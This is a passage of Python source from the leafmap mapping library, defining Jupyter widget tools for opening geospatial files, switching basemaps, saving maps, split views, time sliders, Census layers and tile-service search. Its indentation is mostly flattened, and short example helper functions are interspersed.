layout=widgets.Layout(height="18px", padding="0px 8px 25px 8px"),
)
all_layers_chk.layout.width = "30ex"
layers_hbox.append(all_layers_chk)
def all_layers_chk_changed(change):
if change["new"]:
for layer in m.layers:
layer.visible = True
else:
for layer in m.layers:
layer.visible = False
all_layers_chk.observe(all_layers_chk_changed, "value")
layers = [
lyr
for lyr in m.layers
if (
isinstance(lyr, ipyleaflet.TileLayer)
or isinstance(lyr, ipyleaflet.WMSLayer)
)
]
# if the layers contain unsupported layers (e.g., GeoJSON, GeoData), adds the ipyleaflet built-in LayerControl
if len(layers) < (len(m.layers) - 1):
if m.layer_control is None:
layer_control = ipyleaflet.LayersControl(position="topright")
m.layer_control = layer_control
if m.layer_control not in m.controls:
m.add_control(m.layer_control)
# for non-TileLayer, use layer.style={'opacity':0, 'fillOpacity': 0} to turn layer off.
for layer in layers:
layer_chk = widgets.Checkbox(
value=layer.visible,
description=layer.name,
indent=False,
layout=widgets.Layout(height="18px"),
)
layer_chk.layout.width = "25ex"
layer_opacity = widgets.FloatSlider(
value=layer.opacity,
min=0,
max=1,
step=0.01,
readout=False,
layout=widgets.Layout(width="80px"),
)
layer_settings = widgets.ToggleButton(
icon="gear",
tooltip=layer.name,
layout=widgets.Layout(
width="25px", height="25px", padding="0px 0px 0px 5px"
),
)
# def layer_vis_on_click(change):
# if change["new"]:
# layer_name = change["owner"].tooltip
# change["owner"].value = False
# layer_settings.observe(layer_vis_on_click, "value")
# def layer_chk_changed(change):
# layer_name = change["owner"].description
# layer_chk.observe(layer_chk_changed, "value")
widgets.jslink((layer_chk, "value"), (layer, "visible"))
widgets.jsdlink((layer_opacity, "value"), (layer, "opacity"))
hbox = widgets.HBox(
[layer_chk, layer_settings, layer_opacity],
layout=widgets.Layout(padding="0px 8px 0px 8px"),
)
layers_hbox.append(hbox)
toolbar_footer.children = layers_hbox
toolbar_button.value = False
else:
toolbar_footer.children = [toolbar_grid]
layers_button.observe(layers_btn_click, "value")
toolbar_control = ipyleaflet.WidgetControl(
widget=toolbar_widget, position="topright"
)
m.add_control(toolbar_control)
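# Illustrative wiring sketch (hypothetical). main_toolbar(m) is normally invoked while
# the Map is constructed rather than by the user; it builds the icon grid, stores it on
# m.toolbar, registers the wrench ToggleButton as m.toolbar_button, and adds the whole
# widget as a top-right control. Only the attribute names come from the code above; the
# leafmap.Map() constructor is an assumption here.
def _example_main_toolbar_wiring():
    import leafmap  # assumed available

    m = leafmap.Map()
    main_toolbar(m)
    assert m.toolbar is not None         # the GridBox of tool ToggleButtons
    assert m.toolbar_button is not None  # the wrench button that expands the grid
    return m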
def open_data_widget(m):
"""A widget for opening local vector/raster data.
Args:
m (object): leafmap.Map
"""
padding = "0px 0px 0px 5px"
style = {"description_width": "initial"}
file_type = widgets.ToggleButtons(
options=["Shapefile", "GeoJSON", "CSV", "Vector", "Raster"],
tooltips=[
"Open a shapefile",
"Open a GeoJSON file",
"Create points from CSV",
"Open a vector dataset",
"Open a raster dataset",
],
)
file_type.style.button_width = "88px"
filepath = widgets.Text(
value="",
description="File path or http URL:",
tooltip="Enter a file path or http URL to vector data",
style=style,
layout=widgets.Layout(width="454px", padding=padding),
)
http_widget = widgets.HBox()
file_chooser = FileChooser(
os.getcwd(), sandbox_path=m.sandbox_path, layout=widgets.Layout(width="454px")
)
file_chooser.filter_pattern = "*.shp"
file_chooser.use_dir_icons = True
layer_name = widgets.Text(
value="Shapefile",
description="Enter a layer name:",
tooltip="Enter a layer name for the selected file",
style=style,
layout=widgets.Layout(width="454px", padding=padding),
)
longitude = widgets.Dropdown(
options=[],
value=None,
description="Longitude:",
layout=widgets.Layout(width="149px", padding=padding),
style=style,
)
latitude = widgets.Dropdown(
options=[],
value=None,
description="Latitude:",
layout=widgets.Layout(width="149px", padding=padding),
style=style,
)
label = widgets.Dropdown(
options=[],
value=None,
description="Label:",
layout=widgets.Layout(width="149px", padding=padding),
style=style,
)
point_check = widgets.Checkbox(
description="Is it a point layer?",
indent=False,
layout=widgets.Layout(padding=padding, width="150px"),
style=style,
)
point_popup = widgets.SelectMultiple(
options=[
"None",
],
value=["None"],
description="Popup attributes:",
disabled=False,
style=style,
)
csv_widget = widgets.HBox()
point_widget = widgets.HBox()
def point_layer_check(change):
if point_check.value:
if filepath.value.strip() != "":
m.default_style = {"cursor": "wait"}
point_popup.options = vector_col_names(filepath.value)
point_popup.value = [point_popup.options[0]]
point_widget.children = [point_check, point_popup]
else:
point_widget.children = [point_check]
point_check.observe(point_layer_check)
ok_cancel = widgets.ToggleButtons(
value=None,
options=["Apply", "Reset", "Close"],
tooltips=["Apply", "Reset", "Close"],
button_style="primary",
)
# ok_cancel.style.button_width = "50px"
bands = widgets.Text(
value=None,
description="Band:",
tooltip="Enter a list of band indices",
style=style,
layout=widgets.Layout(width="150px", padding=padding),
)
vmin = widgets.Text(
value=None,
description="vmin:",
tooltip="Minimum value of the raster to visualize",
style=style,
layout=widgets.Layout(width="148px"),
)
vmax = widgets.Text(
value=None,
description="vmax:",
tooltip="Maximum value of the raster to visualize",
style=style,
layout=widgets.Layout(width="148px"),
)
nodata = widgets.Text(
value=None,
description="Nodata:",
tooltip="Nodata the raster to visualize",
style=style,
layout=widgets.Layout(width="150px", padding=padding),
)
palette = widgets.Dropdown(
options=[],
value=None,
description="palette:",
layout=widgets.Layout(width="300px"),
style=style,
)
raster_options = widgets.VBox()
def filepath_change(change):
if file_type.value == "Raster":
pass
# if (
# filepath.value.startswith("http")
# or filepath.value.endswith(".txt")
# or filepath.value.endswith(".csv")
# ):
# bands.disabled = True
# palette.disabled = False
# # x_dim.disabled = True
# # y_dim.disabled = True
# else:
# bands.disabled = False
# palette.disabled = False
# # x_dim.disabled = True
# # y_dim.disabled = True
filepath.observe(filepath_change, "value")
tool_output = widgets.Output(
layout=widgets.Layout(max_height="150px", max_width="500px", overflow="auto")
)
main_widget = widgets.VBox(
[
file_type,
file_chooser,
http_widget,
csv_widget,
layer_name,
point_widget,
raster_options,
ok_cancel,
tool_output,
]
)
tool_output_ctrl = ipyleaflet.WidgetControl(widget=main_widget, position="topright")
if m.tool_output_ctrl is not None and m.tool_output_ctrl in m.controls:
m.remove_control(m.tool_output_ctrl)
def bands_changed(change):
if change["new"] and "," in change["owner"].value:
palette.value = None
palette.disabled = True
else:
palette.disabled = False
bands.observe(bands_changed, "value")
def chooser_callback(chooser):
filepath.value = file_chooser.selected
if file_type.value == "CSV":
import pandas as pd
df = pd.read_csv(filepath.value)
col_names = df.columns.values.tolist()
longitude.options = col_names
latitude.options = col_names
label.options = col_names
if "longitude" in col_names:
longitude.value = "longitude"
if "latitude" in col_names:
latitude.value = "latitude"
if "name" in col_names:
label.value = "name"
file_chooser.register_callback(chooser_callback)
def file_type_changed(change):
ok_cancel.value = None
file_chooser.default_path = os.getcwd()
file_chooser.reset()
layer_name.value = file_type.value
csv_widget.children = []
filepath.value = ""
tool_output.clear_output()
if change["new"] == "Shapefile":
file_chooser.filter_pattern = "*.shp"
raster_options.children = []
point_widget.children = []
point_check.value = False
http_widget.children = []
elif change["new"] == "GeoJSON":
file_chooser.filter_pattern = ["*.geojson", "*.json"]
raster_options.children = []
point_widget.children = []
point_check.value = False
http_widget.children = [filepath]
elif change["new"] == "Vector":
file_chooser.filter_pattern = "*.*"
raster_options.children = []
point_widget.children = [point_check]
point_check.value = False
http_widget.children = [filepath]
elif change["new"] == "CSV":
file_chooser.filter_pattern = ["*.csv", "*.CSV"]
csv_widget.children = [longitude, latitude, label]
raster_options.children = []
point_widget.children = []
point_check.value = False
http_widget.children = [filepath]
elif change["new"] == "Raster":
file_chooser.filter_pattern = ["*.tif", "*.img"]
palette.options = get_palettable(types=["matplotlib", "cartocolors"])
palette.value = None
raster_options.children = [
widgets.HBox([bands, vmin, vmax]),
widgets.HBox([nodata, palette]),
]
point_widget.children = []
point_check.value = False
http_widget.children = [filepath]
def ok_cancel_clicked(change):
if change["new"] == "Apply":
m.default_style = {"cursor": "wait"}
file_path = filepath.value
with tool_output:
tool_output.clear_output()
if file_path.strip() != "":
ext = os.path.splitext(file_path)[1]
if point_check.value:
popup = list(point_popup.value)
if len(popup) == 1:
popup = popup[0]
m.add_point_layer(
file_path,
popup=popup,
layer_name=layer_name.value,
)
elif ext.lower() == ".shp":
m.add_shp(file_path, style={}, layer_name=layer_name.value)
elif ext.lower() == ".geojson":
m.add_geojson(file_path, style={}, layer_name=layer_name.value)
elif ext.lower() == ".csv" and file_type.value == "CSV":
m.add_xy_data(
file_path,
x=longitude.value,
y=latitude.value,
label=label.value,
layer_name=layer_name.value,
)
elif (
ext.lower() in [".tif", "img"]
) and file_type.value == "Raster":
band = None
vis_min = None
vis_max = None
vis_nodata = None
try:
if len(bands.value) > 0:
band = int(bands.value)
if len(vmin.value) > 0:
vis_min = float(vmin.value)
if len(vmax.value) > 0:
vis_max = float(vmax.value)
if len(nodata.value) > 0:
vis_nodata = float(nodata.value)
except:
pass
m.add_local_tile(
file_path,
layer_name=layer_name.value,
band=band,
palette=palette.value,
vmin=vis_min,
vmax=vis_max,
nodata=vis_nodata,
)
else:
print("Please select a file to open.")
m.toolbar_reset()
m.default_style = {"cursor": "default"}
elif change["new"] == "Reset":
file_chooser.reset()
tool_output.clear_output()
filepath.value = ""
m.toolbar_reset()
elif change["new"] == "Close":
if m.tool_output_ctrl is not None and m.tool_output_ctrl in m.controls:
m.remove_control(m.tool_output_ctrl)
m.tool_output_ctrl = None
m.toolbar_reset()
ok_cancel.value = None
file_type.observe(file_type_changed, names="value")
ok_cancel.observe(ok_cancel_clicked, names="value")
# file_chooser.register_callback(chooser_callback)
m.add_control(tool_output_ctrl)
m.tool_output_ctrl = tool_output_ctrl
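# Illustrative sketch (hypothetical file paths). open_data_widget(m) is a GUI front-end
# for the Map methods called in its Apply handler; the calls below mirror that handler
# programmatically, one per file-type branch, using the same keyword arguments.
def _example_open_data_programmatically(m):
    m.add_shp("countries.shp", style={}, layer_name="Shapefile")      # Shapefile branch
    m.add_geojson("cities.geojson", style={}, layer_name="GeoJSON")   # GeoJSON branch
    m.add_xy_data("points.csv", x="longitude", y="latitude",
                  label="name", layer_name="CSV")                     # CSV branch
    m.add_local_tile("dem.tif", layer_name="Raster", band=1,
                     palette=None, vmin=0, vmax=4000, nodata=-9999)   # Raster branch
    return m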
def change_basemap(m):
"""Widget for changing basemaps.
Args:
m (object): leafmap.Map.
"""
from .basemaps import get_xyz_dict
from .leafmap import leafmap_basemaps
xyz_dict = get_xyz_dict()
layers = list(m.layers)
if len(layers) == 1:
layers = [layers[0]] + [leafmap_basemaps["OpenStreetMap"]]
elif len(layers) > 1 and (layers[1].name != "OpenStreetMap"):
layers = [layers[0]] + [leafmap_basemaps["OpenStreetMap"]] + layers[1:]
m.layers = layers
value = "OpenStreetMap"
dropdown = widgets.Dropdown(
options=list(leafmap_basemaps.keys()),
value=value,
layout=widgets.Layout(width="200px"),
)
close_btn = widgets.Button(
icon="times",
tooltip="Close the basemap widget",
button_style="primary",
layout=widgets.Layout(width="32px"),
)
basemap_widget = widgets.HBox([dropdown, close_btn])
def on_click(change):
basemap_name = change["new"]
old_basemap = m.layers[1]
m.substitute_layer(old_basemap, leafmap_basemaps[basemap_name])
if basemap_name in xyz_dict:
if "bounds" in xyz_dict[basemap_name]:
bounds = xyz_dict[basemap_name]["bounds"]
bounds = [bounds[0][1], bounds[0][0], bounds[1][1], bounds[1][0]]
m.zoom_to_bounds(bounds)
dropdown.observe(on_click, "value")
def close_click(change):
m.toolbar_reset()
if m.basemap_ctrl is not None and m.basemap_ctrl in m.controls:
m.remove_control(m.basemap_ctrl)
basemap_widget.close()
close_btn.on_click(close_click)
basemap_control = ipyleaflet.WidgetControl(
widget=basemap_widget, position="topright"
)
m.add_control(basemap_control)
m.basemap_ctrl = basemap_control
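# Illustrative sketch (hypothetical). change_basemap(m) only swaps m.layers[1] through
# m.substitute_layer() when the dropdown changes; the one-liner below is the
# programmatic equivalent of a single swap. The basemap key is an example value and
# leafmap_basemaps is the same dictionary imported inside change_basemap above.
def _example_swap_basemap(m, name="OpenTopoMap"):
    from .leafmap import leafmap_basemaps  # same import used by change_basemap

    m.substitute_layer(m.layers[1], leafmap_basemaps[name])
    return m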
def save_map(m):
"""Saves the map as HTML, JPG, or PNG.
Args:
m (leafmap.Map): The leafmap Map object.
"""
import time
tool_output = widgets.Output()
m.tool_output = tool_output
tool_output.clear_output(wait=True)
save_map_widget = widgets.VBox()
save_type = widgets.ToggleButtons(
options=["HTML", "PNG", "JPG"],
tooltips=[
"Save the map as an HTML file",
"Take a screenshot and save as a PNG file",
"Take a screenshot and save as a JPG file",
],
)
file_chooser = FileChooser(
os.getcwd(), sandbox_path=m.sandbox_path, layout=widgets.Layout(width="454px")
)
file_chooser.default_filename = "my_map.html"
file_chooser.use_dir_icons = True
ok_cancel = widgets.ToggleButtons(
value=None,
options=["OK", "Cancel", "Close"],
tooltips=["OK", "Cancel", "Close"],
button_style="primary",
)
def save_type_changed(change):
ok_cancel.value = None
# file_chooser.reset()
file_chooser.default_path = os.getcwd()
if change["new"] == "HTML":
file_chooser.default_filename = "my_map.html"
elif change["new"] == "PNG":
file_chooser.default_filename = "my_map.png"
elif change["new"] == "JPG":
file_chooser.default_filename = "my_map.jpg"
save_map_widget.children = [save_type, file_chooser]
def chooser_callback(chooser):
save_map_widget.children = [save_type, file_chooser, ok_cancel]
def ok_cancel_clicked(change):
if change["new"] == "OK":
file_path = file_chooser.selected
ext = os.path.splitext(file_path)[1]
if save_type.value == "HTML" and ext.upper() == ".HTML":
tool_output.clear_output()
m.to_html(file_path)
elif save_type.value == "PNG" and ext.upper() == ".PNG":
tool_output.clear_output()
m.toolbar_button.value = False
if m.save_map_control is not None:
m.remove_control(m.save_map_control)
m.save_map_control = None
time.sleep(2)
screen_capture(outfile=file_path)
elif save_type.value == "JPG" and ext.upper() == ".JPG":
tool_output.clear_output()
m.toolbar_button.value = False
if m.save_map_control is not None:
m.remove_control(m.save_map_control)
m.save_map_control = None
time.sleep(2)
screen_capture(outfile=file_path)
else:
label = widgets.Label(
value="The selected file extension does not match the selected exporting type."
)
save_map_widget.children = [save_type, file_chooser, label]
elif change["new"] == "Cancel":
tool_output.clear_output()
file_chooser.reset()
elif change["new"] == "Close":
if m.save_map_control is not None:
m.remove_control(m.save_map_control)
m.save_map_control = None
ok_cancel.value = None
m.toolbar_reset()
save_type.observe(save_type_changed, names="value")
ok_cancel.observe(ok_cancel_clicked, names="value")
file_chooser.register_callback(chooser_callback)
save_map_widget.children = [save_type, file_chooser]
save_map_control = ipyleaflet.WidgetControl(
widget=save_map_widget, position="topright"
)
m.add_control(save_map_control)
m.save_map_control = save_map_control
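# Illustrative sketch (hypothetical output filenames). save_map(m) wraps two export
# paths from its OK handler: m.to_html() for HTML, and screen_capture() (imported via
# .common) for PNG/JPG screenshots taken after the control is removed.
def _example_save_map_directly(m):
    m.to_html("my_map.html")              # HTML branch of the OK handler
    screen_capture(outfile="my_map.png")  # PNG/JPG branch: captures the current view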
def split_basemaps(
m, layers_dict=None, left_name=None, right_name=None, width="120px", **kwargs
):
"""Create a split-panel map for visualizing two maps.
Args:
m (ipyleaflet.Map): An ipyleaflet map object.
layers_dict (dict, optional): A dictionary of TileLayers. Defaults to None.
left_name (str, optional): The default value of the left dropdown list. Defaults to None.
right_name (str, optional): The default value of the right dropdown list. Defaults to None.
width (str, optional): The width of the dropdown list. Defaults to "120px".
"""
from .leafmap import leafmap_basemaps
controls = m.controls
layers = m.layers
# m.layers = [m.layers[0]]
m.clear_controls()
add_zoom = True
add_fullscreen = True
if layers_dict is None:
layers_dict = {}
keys = dict(leafmap_basemaps).keys()
for key in keys:
if isinstance(leafmap_basemaps[key], ipyleaflet.WMSLayer):
pass
else:
layers_dict[key] = leafmap_basemaps[key]
keys = list(layers_dict.keys())
if left_name is None:
left_name = keys[0]
if right_name is None:
right_name = keys[-1]
left_layer = layers_dict[left_name]
right_layer = layers_dict[right_name]
control = ipyleaflet.SplitMapControl(left_layer=left_layer, right_layer=right_layer)
m.add_control(control)
left_dropdown = widgets.Dropdown(
options=keys, value=left_name, layout=widgets.Layout(width=width)
)
left_control = ipyleaflet.WidgetControl(widget=left_dropdown, position="topleft")
m.add_control(left_control)
right_dropdown = widgets.Dropdown(
options=keys, value=right_name, layout=widgets.Layout(width=width)
)
right_control = ipyleaflet.WidgetControl(widget=right_dropdown, position="topright")
m.add_control(right_control)
close_button = widgets.ToggleButton(
value=False,
tooltip="Close the tool",
icon="times",
# button_style="primary",
layout=widgets.Layout(height="28px", width="28px", padding="0px 0px 0px 4px"),
)
def close_btn_click(change):
if change["new"]:
m.controls = controls
m.clear_layers()
m.layers = layers
close_button.observe(close_btn_click, "value")
close_control = ipyleaflet.WidgetControl(
widget=close_button, position="bottomright"
)
m.add_control(close_control)
if add_zoom:
m.add_control(ipyleaflet.ZoomControl())
if add_fullscreen:
m.add_control(ipyleaflet.FullScreenControl())
m.add_control(ipyleaflet.ScaleControl(position="bottomleft"))
split_control = None
for ctrl in m.controls:
if isinstance(ctrl, ipyleaflet.SplitMapControl):
split_control = ctrl
break
def left_change(change):
split_control.left_layer.url = layers_dict[left_dropdown.value].url
left_dropdown.observe(left_change, "value")
def right_change(change):
split_control.right_layer.url = layers_dict[right_dropdown.value].url
right_dropdown.observe(right_change, "value")
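# Illustrative sketch (hypothetical basemap keys). split_basemaps(m) builds an
# ipyleaflet SplitMapControl whose left/right dropdowns rewrite the layer URLs; passing
# layers_dict restricts the available choices. "Esri.WorldImagery" is assumed to be a
# valid leafmap_basemaps key; "OpenStreetMap" is used elsewhere in this module.
def _example_split_basemaps(m):
    from .leafmap import leafmap_basemaps  # same source used when layers_dict is None

    pair = {
        "Esri imagery": leafmap_basemaps["Esri.WorldImagery"],
        "OpenStreetMap": leafmap_basemaps["OpenStreetMap"],
    }
    split_basemaps(m, layers_dict=pair,
                   left_name="Esri imagery", right_name="OpenStreetMap")
    return m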
def time_slider(
m,
layers_dict={},
labels=None,
time_interval=1,
position="bottomright",
slider_length="150px",
):
"""Adds a time slider to the map.
Args:
m (leafmap.Map): The leafmap Map object.
layers_dict (dict, optional): The dictionary containing a set of XYZ tile layers. Defaults to {} (Planet monthly tiles are used when empty).
labels (list, optional): The list of labels to be used for the time series. Defaults to None.
time_interval (int, optional): Time interval in seconds. Defaults to 1.
position (str, optional): Position to place the time slider, can be any of ['topleft', 'topright', 'bottomleft', 'bottomright']. Defaults to "bottomright".
slider_length (str, optional): Length of the time slider. Defaults to "150px".
"""
import time
import threading
if not isinstance(layers_dict, dict):
raise TypeError("The layers_dict must be a dictionary.")
if len(layers_dict) == 0:
layers_dict = planet_monthly_tiles()
if labels is None:
labels = list(layers_dict.keys())
if len(labels) != len(layers_dict):
raise ValueError("The length of labels is not equal to that of layers_dict.")
slider = widgets.IntSlider(
min=1,
max=len(labels),
readout=False,
continuous_update=False,
layout=widgets.Layout(width=slider_length),
)
label = widgets.Label(
value=labels[0], layout=widgets.Layout(padding="0px 5px 0px 5px")
)
play_btn = widgets.Button(
icon="play",
tooltip="Play the time slider",
button_style="primary",
layout=widgets.Layout(width="32px"),
)
pause_btn = widgets.Button(
icon="pause",
tooltip="Pause the time slider",
button_style="primary",
layout=widgets.Layout(width="32px"),
)
close_btn = widgets.Button(
icon="times",
tooltip="Close the time slider",
button_style="primary",
layout=widgets.Layout(width="32px"),
)
play_chk = widgets.Checkbox(value=False)
slider_widget = widgets.HBox([label, slider, play_btn, pause_btn, close_btn])
def play_click(b):
play_chk.value = True
def work(slider):
while play_chk.value:
if slider.value < len(labels):
slider.value += 1
else:
slider.value = 1
time.sleep(time_interval)
thread = threading.Thread(target=work, args=(slider,))
thread.start()
def pause_click(b):
play_chk.value = False
play_btn.on_click(play_click)
pause_btn.on_click(pause_click)
keys = list(layers_dict.keys())
layer = layers_dict[keys[0]]
m.add_layer(layer)
def slider_changed(change):
m.default_style = {"cursor": "wait"}
index = slider.value - 1
label.value = labels[index]
layer.url = layers_dict[label.value].url
layer.name = layers_dict[label.value].name
m.default_style = {"cursor": "default"}
slider.observe(slider_changed, "value")
def close_click(b):
play_chk.value = False
m.toolbar_reset()
if m.slider_ctrl is not None and m.slider_ctrl in m.controls:
m.remove_control(m.slider_ctrl)
slider_widget.close()
close_btn.on_click(close_click)
slider_ctrl = ipyleaflet.WidgetControl(widget=slider_widget, position=position)
m.add_control(slider_ctrl)
m.slider_ctrl = slider_ctrl
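# Illustrative sketch (hypothetical). time_slider(m) cycles a single TileLayer through
# the URLs/names in layers_dict, with a background thread advancing the slider every
# time_interval seconds while play is active. planet_monthly_tiles() comes from the
# .common import above and is assumed to need a Planet API key configured.
def _example_time_slider(m):
    monthly = planet_monthly_tiles()  # {label: ipyleaflet.TileLayer}
    time_slider(m, layers_dict=monthly, time_interval=2, position="bottomright")
    return m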
def census_widget(m=None):
"""Widget for adding US Census data.
Args:
m (leafmap.Map, optional): The leaflet Map object. Defaults to None.
Returns:
ipywidgets: The tool GUI widget.
"""
from owslib.wms import WebMapService
census_dict = get_census_dict()
m.add_census_data("Census 2020", "States")
widget_width = "250px"
padding = "0px 0px 0px 5px" # upper, right, bottom, left
style = {"description_width": "initial"}
toolbar_button = widgets.ToggleButton(
value=False,
tooltip="Toolbar",
icon="address-book",
layout=widgets.Layout(width="28px", height="28px", padding="0px 0px 0px 4px"),
)
close_button = widgets.ToggleButton(
value=False,
tooltip="Close the tool",
icon="times",
button_style="primary",
layout=widgets.Layout(height="28px", width="28px", padding="0px 0px 0px 4px"),
)
wms = widgets.Dropdown(
options=census_dict.keys(),
value="Census 2020",
description="WMS:",
layout=widgets.Layout(width=widget_width, padding=padding),
style=style,
)
layer = widgets.Dropdown(
options=census_dict["Census 2020"]["layers"],
value="States",
description="Layer:",
layout=widgets.Layout(width=widget_width, padding=padding),
style=style,
)
checkbox = widgets.Checkbox(
description="Replace existing census data layer",
value=True,
indent=False,
layout=widgets.Layout(padding=padding, width=widget_width),
)
# output = widgets.Output(layout=widgets.Layout(width=widget_width, padding=padding))
toolbar_widget = widgets.VBox()
toolbar_widget.children = [toolbar_button]
toolbar_header = widgets.HBox()
toolbar_header.children = [close_button, toolbar_button]
toolbar_footer = widgets.VBox()
toolbar_footer.children = [
wms,
layer,
checkbox,
# output,
]
toolbar_event = ipyevents.Event(
source=toolbar_widget, watched_events=["mouseenter", "mouseleave"]
)
def handle_toolbar_event(event):
if event["type"] == "mouseenter":
toolbar_widget.children = [toolbar_header, toolbar_footer]
elif event["type"] == "mouseleave":
if not toolbar_button.value:
toolbar_widget.children = [toolbar_button]
toolbar_button.value = False
close_button.value = False
toolbar_event.on_dom_event(handle_toolbar_event)
def toolbar_btn_click(change):
if change["new"]:
close_button.value = False
toolbar_widget.children = [toolbar_header, toolbar_footer]
else:
if not close_button.value:
toolbar_widget.children = [toolbar_button]
toolbar_button.observe(toolbar_btn_click, "value")
def close_btn_click(change):
if change["new"]:
toolbar_button.value = False
if m is not None:
m.toolbar_reset()
if m.tool_control is not None and m.tool_control in m.controls:
m.remove_control(m.tool_control)
m.tool_control = None
toolbar_widget.close()
close_button.observe(close_btn_click, "value")
def wms_change(change):
layer.options = census_dict[change["new"]]["layers"]
layer.value = layer.options[0]
wms.observe(wms_change, "value")
def layer_change(change):
if change["new"] != "":
if checkbox.value:
m.layers = m.layers[:-1]
m.add_census_data(wms.value, layer.value)
# with output:
# w = WebMapService(census_dict[wms.value]["url"])
# output.clear_output()
# print(w[layer.value].abstract)
layer.observe(layer_change, "value")
toolbar_button.value = True
if m is not None:
toolbar_control = ipyleaflet.WidgetControl(
widget=toolbar_widget, position="topright"
)
if toolbar_control not in m.controls:
m.add_control(toolbar_control)
m.tool_control = toolbar_control
else:
return toolbar_widget
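# Illustrative sketch (hypothetical). census_widget(m) is a thin GUI over
# m.add_census_data(wms, layer); the WMS and layer names come from get_census_dict()
# (imported via .common). The call below mirrors the widget's own defaults.
def _example_census_layer(m):
    census_dict = get_census_dict()
    assert "Census 2020" in census_dict  # default WMS used by the widget
    m.add_census_data("Census 2020", "States")
    return m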
def search_basemaps(m=None):
"""The widget for search XYZ tile services.
Args:
m (leafmap.Map, optional): The leaflet Map object. Defaults to None.
Returns:
ipywidgets: The tool GUI widget.
"""
import xyzservices.providers as xyz
from xyzservices import TileProvider
layers = m.layers
widget_width = "250px"
padding = "0px 0px 0px 5px" # upper, right, bottom, left
style = {"description_width": "initial"}
toolbar_button = widgets.ToggleButton(
value=False,
tooltip="Toolbar",
icon="search",
layout=widgets.Layout(width="28px", height="28px", padding="0px 0px 0px 4px"),
)
close_button = widgets.ToggleButton(
value=False,
tooltip="Close the tool",
icon="times",
button_style="primary",
layout=widgets.Layout(height="28px", width="28px", padding="0px 0px 0px 4px"),
)
checkbox = widgets.Checkbox(
description="Search Quick Map Services (QMS)",
indent=False,
layout=widgets.Layout(padding=padding, width=widget_width),
)
providers = widgets.Dropdown(
options=[],
value=None,
description="XYZ Tile:",
layout=widgets.Layout(width=widget_width, padding=padding),
style=style,
)
keyword = widgets.Text(
value="",
description="Search keyword:",
placeholder="OpenStreetMap",
style=style,
layout=widgets.Layout(width=widget_width, padding=padding),
)
def search_callback(change):
providers.options = []
if keyword.value != "":
tiles = search_xyz_services(keyword=keyword.value)
if checkbox.value:
tiles = tiles + search_qms(keyword=keyword.value)
providers.options = tiles
keyword.on_submit(search_callback)
buttons = widgets.ToggleButtons(
value=None,
options=["Search", "Reset", "Close"],
tooltips=["Search", "Reset", "Close"],
button_style="primary",
)
buttons.style.button_width = "80px"
output = widgets.Output(layout=widgets.Layout(width=widget_width, padding=padding))
def providers_change(change):
# with output:
# print(change["new"])
if change["new"] != "":
provider = change["new"]
if provider is not None:
if provider.startswith("qms"):
with output:
output.clear_output()
print("Adding data. Please wait...")
name = provider[4:]
qms_provider = TileProvider.from_qms(name)
url = qms_provider.build_url()
attribution = qms_provider.attribution
m.layers = layers
m.add_tile_layer(url, name, attribution)
output.clear_output()
elif provider.startswith("xyz"):
name = provider[4:]
xyz_provider = xyz.flatten()[name]
url = xyz_provider.build_url()
attribution = xyz_provider.attribution
m.layers = layers
if xyz_provider.requires_token():
with output:
output.clear_output()
print(f"{provider} requires an API Key.")
m.add_tile_layer(url, name, attribution)
providers.observe(providers_change, "value")
toolbar_widget = widgets.VBox()
toolbar_widget.children = [toolbar_button]
toolbar_header = widgets.HBox()
toolbar_header.children = [close_button, toolbar_button]
toolbar_footer = widgets.VBox()
toolbar_footer.children = [
checkbox,
keyword,
providers,
buttons,
output,
]
toolbar_event = ipyevents.Event(
source=toolbar_widget, watched_events=["mouseenter", "mouseleave"]
)
def handle_toolbar_event(event):
if event["type"] == "mouseenter":
toolbar_widget.children = [toolbar_header, toolbar_footer]
elif event["type"] == "mouseleave":
if not toolbar_button.value:
toolbar_widget.children = [toolbar_button]
toolbar_button.value = False
close_button.value = False
toolbar_event.on_dom_event(handle_toolbar_event)
def toolbar_btn_click(change):
if change["new"]:
close_button.value = False
toolbar_widget.children = [toolbar_header, toolbar_footer]
else:
if not close_button.value:
toolbar_widget.children = [toolbar_button]
toolbar_button.observe(toolbar_btn_click, "value")
def close_btn_click(change):
if change["new"]:
toolbar_button.value = False
if m is not None:
m.toolbar_reset()
if m.tool_control is not None and m.tool_control in m.controls:
m.remove_control(m.tool_control)
m.tool_control = None
toolbar_widget.close()
close_button.observe(close_btn_click, "value")
def button_clicked(change):
if change["new"] == "Search":
providers.options = []
if keyword.value != "":
tiles = search_xyz_services(keyword=keyword.value)
if checkbox.value:
tiles = tiles + search_qms(keyword=keyword.value)
providers.options = tiles
with output:
output.clear_output()
# print("Running ...")
elif change["new"] == "Reset":
keyword.value = ""
providers.options = []
output.clear_output()
elif change["new"] == "Close":
if m is not None:
m.toolbar_reset()
if m.tool_control is not None and m.tool_control in m.controls:
m.remove_control(m.tool_control)
m.tool_control = None
toolbar_widget.close()
buttons.value = None
buttons.observe(button_clicked, "value")
toolbar_button.value = True
if m is not None:
toolbar_control = ipyleaflet.WidgetControl(
widget=toolbar_widget, position="topright"
)
if toolbar_control not in m.controls:
m.add_control(toolbar_control)
m.tool_control = toolbar_control
else:
return toolbar_widget
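# Illustrative sketch (hypothetical provider key). search_basemaps(m) resolves dropdown
# entries prefixed with "xyz." or "qms." into tile URLs via xyzservices; the snippet
# below reproduces the "xyz." branch outside the widget.
def _example_resolve_xyz_provider():
    import xyzservices.providers as xyz

    provider = xyz.flatten()["OpenStreetMap.Mapnik"]  # same lookup as the "xyz." branch
    url = provider.build_url()
    attribution = provider.attribution
    # The "qms." branch instead calls TileProvider.from_qms(name), which needs network
    # access to the Quick Map Services catalogue.
    return url, attribution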
def download_osm(m=None):
"""Widget for downloading OSM data.
Args:
m (leafmap.Map, optional): The leaflet Map object. Defaults to None.
Returns:
ipywidgets: The tool GUI widget.
"""
widget_width = "250px"
padding = "0px 0px 0px 5px" # upper, right, bottom, left
style = {"description_width": "initial"}
toolbar_button = widgets.ToggleButton(
value=False,
tooltip="Toolbar",
icon="gear",
layout=widgets.Layout(width="28px", height="28px", padding="0px 0px 0px 4px"),
)
close_button = widgets.ToggleButton(
value=False,
tooltip="Close the tool",
icon="times",
button_style="primary",
layout=widgets.Layout(height="28px", width="28px", padding="0px 0px 0px 4px"),
)
checkbox = widgets.Checkbox(
description="Checkbox",
indent=False,
layout=widgets.Layout(padding=padding, width=widget_width),
)
dropdown = widgets.Dropdown(
options=["Option 1", "Option 2", "Option 3"],
value=None,
description="Dropdown:",
layout=widgets.Layout(width=widget_width, padding=padding),
style=style,
)
int_slider = widgets.IntSlider(
min=1,
max=100,
description="Int Slider: ",
readout=False,
continuous_update=True,
